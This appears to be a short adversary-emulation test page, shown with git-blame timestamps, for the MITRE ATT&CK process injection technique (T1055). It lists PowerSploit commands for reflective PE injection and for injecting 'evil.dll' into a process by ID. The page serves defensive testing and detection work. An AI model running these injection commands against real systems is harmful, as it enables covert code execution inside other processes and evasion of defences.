2018-04-24 10:31:26 -04:00
|
|
|
## Process Injection
|
2017-10-11 10:35:17 -07:00
|
|
|
|
|
|
|
|
MITRE ATT&CK Technique: [T1055](https://attack.mitre.org/wiki/Technique/T1055)
|
|
|
|
|
|
|
|
|
|
Examples and code resource for [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/CodeExecution)
|
|
|
|
|
|
|
|
|
|
### PowerShell Invoke-ReflectivePEInjection
|
|
|
|
|
|
|
|
|
|
Input:
|
|
|
|
|
|
|
|
|
|
C:\Users\Public\PowerSploit-master\PowerSploit-master\CodeExecution\Invoke-ReflectivePEInjection.ps1
|
|
|
|
|
|
|
|
|
|
### Powershell Invoke-DllInjection
|
|
|
|
|
|
|
|
|
|
Input:
|
|
|
|
|
|
|
|
|
|
C:\Users\Public\PowerSploit-master\PowerSploit-master\CodeExecution\Invoke-DllInjection.ps1 -ProcessID 4274 -Dll evil.dll
|